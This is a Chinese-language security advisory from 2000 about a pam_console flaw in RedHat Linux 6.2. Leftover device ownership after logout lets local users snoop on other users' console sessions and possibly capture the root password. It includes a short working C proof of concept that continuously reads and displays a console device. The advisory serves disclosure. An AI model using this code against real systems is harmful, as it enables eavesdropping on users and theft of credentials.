多个LINUX版本存在Pam_console漏洞发布时间:2000-09-01 更新时间:2000-09-01 严重程度:高 威胁程度:本地管理员权限 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 下面版本的LINUX存在Pam_console漏洞: RedHat Linux 6.2 sparc详细描述 linux的PAM模块中的pam_console存在漏洞,Pam_console 可设计用来允许只有console用户才能使用如声音等设备的资源。此pam_console在用户登录时把设备的属主改变给用户,而当用户LOGOUT时又把设备的属主改回ROOT所有。 但是,一部分设备没有'hangup'机制,如TTY设备,它存在可能使一个本地用户在LOGOUT后在某些设备上继续监视活动。这会导致一恶意用户可以SNIFF其他用户的console会话,并且如果ROOT用户LOGIN时有可能获得ROOT的密码。他们也可以秘密的在用户的console上执行命令。 测试代码 测试代码: #include main(int argc,char*argv[]) { char buf[80*24]; int f=open(argv[1],O_RDWR); while (1) { lseek(f,0,0); read(f,buf,sizeof(buf)); write(1,"\033[2J\033[H",7); // clear terminal, vt100/linux/ansi write(1,buf,sizeof(buf)); usleep(10000); } } 解决方案 尚无 相关信息 |
